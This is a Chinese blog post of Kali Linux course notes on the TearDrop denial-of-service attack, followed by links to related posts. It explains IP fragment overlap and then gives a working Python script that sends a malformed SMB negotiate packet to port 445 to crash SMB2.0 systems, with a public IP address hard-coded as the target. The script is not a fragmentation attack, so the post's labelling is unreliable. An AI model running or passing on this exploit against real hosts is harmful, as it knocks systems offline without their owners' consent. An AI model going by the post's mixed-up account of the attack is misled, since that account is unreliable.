Kali Linux渗透测试 128 拒绝服务--TearDrop 攻击
本文记录 Kali Linux 2018.1 学习使用和渗透测试的详细过程,教程为安全牛课堂里的《Kali Linux 渗透测试》课程
Kali Linux渗透测试(苑房弘)博客记录
1. 简介
主要针对早期微软操作系统(95、98、3.x、nt)
近些年有人发现对 2.x 版本的安卓系统、6.0 IOS 系统攻击有效原理很有趣
- 使用 IP 分段便宜实现分段覆盖,接收端处理分段覆盖时可被拒绝服务
攻击效果
- 被攻击者蓝屏、重启、卡死
- Ping大包,比较正常分段与teardrop攻击流量的区别
针对早期windows系统SMB协议的攻击
- teardrop_smb.py
针对Android.IOS 系统的攻击
- teardrop_androidios.py
攻击向量并不确定,要视具体协议分析
2. 攻击目标
泪滴攻击是一种拒绝服务(DoS)攻击,涉及将碎片数据包发送到目标机器。由于接收这些数据包的机器由于TCP / IP碎片重组错误而无法重新组装,因此数据包相互重叠,导致目标网络设备崩溃。这通常发生在较早的操作系统上,例如Windows 3.1x,Windows 95,Windows NT和2.1.63之前版本的Linux内核。
IP报头中的一个字段是“片段偏移量”字段,指示包含在分段数据包中的数据相对于原始数据包中的数据的起始位置或偏移量。如果一个分片数据包的偏移量和大小之和不同于下一个分片数据包的偏移量和大小之和,则数据包重叠。发生这种情况时,易受泪滴攻击的服务器无法重新组装数据包 - 从而导致拒绝服务状况。
3. 攻击脚本
#!/usr/bin/python
# When SMB2.0 recieve a "&" char in the "Process Id High"
# SMB header field it dies with a
# PAGE_FAULT_IN_NONPAGED_AREA
# filename: teardrop-attack-smb.pyimport sys
from socket import socket
from time import sleep#host = sys.argv[1], 445
#host = "192.168.33.13", 445
host = "217.113.205.53", 445
buff = (
"\x00\x00\x00\x90" # Begin SMB header: Session message
"\xff\x53\x4d\x42" # Server Component: SMB
"\x72\x00\x00\x00" # Negociate Protocol
"\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853
"\x00\x26"# Process ID High: --> :) normal value should be "\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
"\x30\x30\x32\x00"
)
s = socket()
s.connect(host)
s.send(buff)
s.close()
Kali Linux渗透测试 128 拒绝服务--TearDrop 攻击相关推荐
- Kali Linux渗透测试 126 拒绝服务--Smurf 攻击
本文记录 Kali Linux 2018.1 学习使用和渗透测试的详细过程,教程为安全牛课堂里的<Kali Linux 渗透测试>课程 Kali Linux渗透测试(苑房弘)博客记录 1. ...
- Kali Linux渗透测试-Ettercap DNS欺骗攻击
Kali Linux渗透测试-Ettercap DNS欺骗攻击 DNS欺骗攻击基于中间人攻击.攻击者更改受害者从DNS服务器查询的域名解析结果,给受害者发送恶意网页或者钓鱼网页-浏览器依然显示正常的u ...
- kail linux dns欺骗,Kali Linux渗透测试-Ettercap DNS欺骗攻击-Go语言中文社区
Kali Linux渗透测试-Ettercap DNS欺骗攻击 DNS欺骗攻击基于中间人攻击.攻击者更改受害者从DNS服务器查询的域名解析结果,给受害者发送恶意网页或者钓鱼网页-浏览器依然显示正常的u ...
- Kali Linux 渗透测试 博客记录
本文记录 Kali Linux 2018.1 学习使用和渗透测试的详细过程,教程为安全牛课堂里的<Kali Linux 渗透测试>课程 文章为长时间连载,内容具有连续性,禁止转载! --- ...
- KALI LINUX渗透测试学习笔记
KALI LINUX渗透测试学习笔记 (苑房弘主讲) 第1章 课程介绍 任务1:Kali Linux渗透测试介绍.exe 安全问题的根源: 分层思想 只求功能实现 最大的威胁是人 渗透测试: 尝试挫败 ...
- Kali Linux渗透测试——无线渗透
笔记内容参考安全牛课堂苑房弘老师的Kali Linux渗透测试教程,以及文章: https://blog.csdn.net/qq_38265137/article/details/80370554 h ...
- Kali Linux渗透测试——WEB渗透(一)
笔记内容参考安全牛课堂苑房弘老师的Kali Linux渗透测试教程 文章目录 扫描工具 1.HTTrack 2.Nikto 3.Vega 4.OWASP ZAP 5.Burp Suite 6.AWVS ...
- Kali Linux渗透测试——信息收集
笔记内容参考安全牛课堂苑房弘老师的Kali Linux渗透测试教程 渗透测试标准(PTES:http://www.pentest-standard.org)的七个阶段: 1.前期交互阶段:讨论确定渗透 ...
- 【Kali Linux 渗透测试】学习笔记
Kali Linux 渗透测试 文章目录 Kali Linux 渗透测试 介绍 一. 渗透测试标准 二. 安装 三. 定制 网络配置 更新升级 安裝软件包 并发线程限制 电源优化 快捷键 四. 试验环 ...
最新文章
- Linq中两种更新操作
- DrawIcon 和 DrawIconEx都失真
- 在 OS X 中使用 OpenResty
- HashMap的遍历方法
- Netty实现自定义协议
- 用matlab做一个有刻度的网格,已知45个点X Y Z的坐标值已知,如何用matlab画出网格图,另外每个小方格里带颜色 - 程序语言 - 小木虫 - 学术 科研 互动社区...
- 【原创】分布式之大话CAP
- TFS与Eclipse、Microsoft Visual Studio等客户端以webservice进行交换。
- php判断对象属于哪个类,PHP instanceof:判断对象是否属于某个类
- 前端学习(1477):计算属性文档分析
- desktop docker 无法卸载_Docker容器无法停止或移除-权限被拒绝错误
- 数据结构----排序
- TCP协议相关属性设置之SO_DONTLINGER属性
- SketchUp Pro 2019 for Mac(草图大师)
- 中国中央空调行业竞争力策略及未来发展潜力预测报告2021年版
- 消息称微软Windows暂停接受华为新订单;2019 Q1 亚太区公有云IaaS、PaaS服务收入排名现已揭晓……...
- 肇庆七星岩星湖 情迷湿地公园
- PHP根据出生日期计算年龄
- 齐岳多吡啶萘酰亚胺荧光树形分子(PDPN),三萘嵌二苯二酰亚胺类近红外有机光功能分子定制,4-氨基-1, 8-萘酰亚胺类化合物
- Centos8搭建并应用NIS服务